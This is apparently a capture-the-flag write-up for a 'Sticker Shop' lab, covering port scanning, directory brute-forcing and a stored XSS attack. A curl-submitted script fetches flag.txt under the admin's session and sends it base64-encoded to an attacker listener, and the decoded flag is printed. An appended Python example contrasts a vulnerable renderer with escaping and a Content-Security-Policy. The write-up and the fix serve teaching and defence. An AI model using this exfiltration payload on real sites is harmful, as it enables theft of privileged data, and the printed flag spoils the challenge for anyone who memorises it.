## 🛡️ Penetration Testing Report – Sticker Shop Challenge
**Target IP:** `10.10.110.114`
**Goal:** Retrieve the flag located at `http://10.10.110.114:8080/flag.txt`
---
### 1. Initial Reconnaissance
#### Accessing Web Server via Browser:
- Attempted direct access to the IP via browser.
- **Response:**
`Error 405 - Specified method is invalid for this resource.`
Indicates the server is up, but the HTTP method used (likely GET) is not allowed.
---
### 2. Port Scanning
```bash
nmap -v 10.10.110.114
```
**Results:**
```
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
MAC Address: 02:F3:3C:7E:26:BF (Unknown)
```
---
### 3. Hidden Directory Discovery
```bash
gobuster dir -u http://10.10.110.114:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
```
**Findings:**
- `/view_feedback` → **Status 401 Unauthorized**
#### Manual Attempts:
- Accessing `http://10.10.110.114:8080/view_feedback` → **401 Unauthorized**
- `view-source` inspection → No useful information
- Accessing `http://10.10.110.114:8080/flag.txt` → **401 Unauthorized**
- `view-source` inspection → No output
---
### 4. Web Application Investigation
- Visited the main page: `http://10.10.110.114:8080`
- Found a **feedback submission form**
- Observed that the input field allows special characters (e.g., `<`, `>`), indicating potential for **XSS injection**.
---
### 5. XSS Payload Testing
#### 5.1 Inspecting the POST structure:
```json
{"feedback": "<script>alert('Sensitive+To+XSS')</script>+"}
```
#### 5.2 Testing payload with window.open:
```bash
curl -X POST http://10.10.110.114:8080/submit_feedback \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "feedback=<script>window.open('/view_feedback')</script>"
```
- Result:
The response was a valid HTML page (`<!DOCTYPE html>`).
✅ Confirms the script is rendered, meaning an **admin opening the feedback would trigger the payload**.
---
### 6. Exploiting XSS to Access Protected Resource (flag.txt)
#### Objective:
Exfiltrate the contents of `flag.txt` (401-protected) by abusing an authenticated user's privileges (e.g., the admin reading the feedback).
#### Steps:
##### 6.1 Set up a Listener using Netcat:
```bash
nc -lvnp 8080
```
> Output:
> `Listening on 0.0.0.0 8080`
##### 6.2 Injecting Malicious Feedback Payload (XSS):
```bash
curl -X POST http://10.10.110.114:8080/submit_feedback \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "feedback=<script>fetch('/flag.txt').then(r => r.text()).then(d => {fetch('http://YOUR_IP:8080/?flag=' + btoa(d));});</script>"
```
> ✅ Feedback submission confirmed (HTML response returned)
##### 6.3 Capturing the Flag:
> Output on netcat listener:
```
Connection received on 10.10.226.39 41714
GET /?flag=VEhNezgzNzg5YTY5MDc0ZjYzNmY2NGEzODg3OWNmY2FiZThiNjIzMDVlZTZ9 HTTP/1.1
```
##### 6.4 Decoding Flag (Base64):
Use [https://www.base64decode.org/](https://www.base64decode.org/)
> Encoded flag:
> `VEhNezgzNzg5YTY5MDc0ZjYzNmY2NGEzODg3OWNmY2FiZThiNjIzMDVlZTZ9`
> ✅ Decoded flag:
```text
THM{83789a69074f636f64a38879cfcabe8b62305ee6}
```
---
### ✅ Conclusion
- Successfully bypassed access control via **stored XSS**.
- Extracted sensitive data (`flag.txt`) by leveraging the **admin’s session**.
- Identified a severe vulnerability caused by **lack of input sanitization** and **authenticated content exposure**.
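Added example, not code from the write-up or from the challenge application: a feedback-rendering handler that behaves the way this attack requires, beside a hardened version that HTML-escapes on output and sends a Content-Security-Policy, plus a simplified CSP check showing why `connect-src 'self'` blocks the exfiltration step. It assumes a Python back end that stores feedback as plain strings; `ATTACKER_IP` is a placeholder and the sample feedback is constructed.

```python
import html
from typing import Dict, Iterable, List

# Constructed sample input, modelled on the write-up's payload (ATTACKER_IP is a placeholder).
SAMPLE_FEEDBACK = [
    "Great stickers!",
    "<script>fetch('/flag.txt').then(r => r.text())"
    ".then(d => fetch('http://ATTACKER_IP:8080/?flag=' + btoa(d)));</script>",
]

def render_feedback_vulnerable(entries: Iterable[str]) -> str:
    """Vulnerable: stored feedback is interpolated into the admin page verbatim."""
    items = "".join(f"<li>{e}</li>" for e in entries)
    return f"<!DOCTYPE html><html><body><ul>{items}</ul></body></html>"

def render_feedback_hardened(entries: Iterable[str]) -> str:
    """Hardened: every entry is HTML-escaped at output time, so tags render as text."""
    items = "".join(f"<li>{html.escape(e, quote=True)}</li>" for e in entries)
    return f"<!DOCTYPE html><html><body><ul>{items}</ul></body></html>"

def hardened_headers() -> Dict[str, str]:
    """Defence in depth for /view_feedback: no inline scripts and no cross-origin fetch()."""
    return {
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; connect-src 'self'; "
            "object-src 'none'; base-uri 'none'"
        ),
        "X-Content-Type-Options": "nosniff",
    }

def contains_script_tag(rendered: str) -> bool:
    """Crude check: does the rendered page contain a live <script> element?"""
    return "<script" in rendered.lower()

def parse_csp(policy: str) -> Dict[str, List[str]]:
    """Split a CSP header value into {directive: [sources]}."""
    out: Dict[str, List[str]] = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            out[tokens[0].lower()] = tokens[1:]
    return out

def csp_allows_connect(policy: str, page_origin: str, target_origin: str) -> bool:
    """Simplified CSP evaluation: may fetch() from page_origin reach target_origin?
    Falls back to default-src; understands 'self', '*' and exact origins only."""
    sources = parse_csp(policy).get("connect-src") or parse_csp(policy).get("default-src", ["*"])
    for src in sources:
        if src == "'self'" and target_origin == page_origin:
            return True
        if src == "*" or src == target_origin:
            return True
    return False
```

With the hardened renderer the payload is displayed as literal text, and even if a script did run, the policy denies the outbound `fetch()` to the listener.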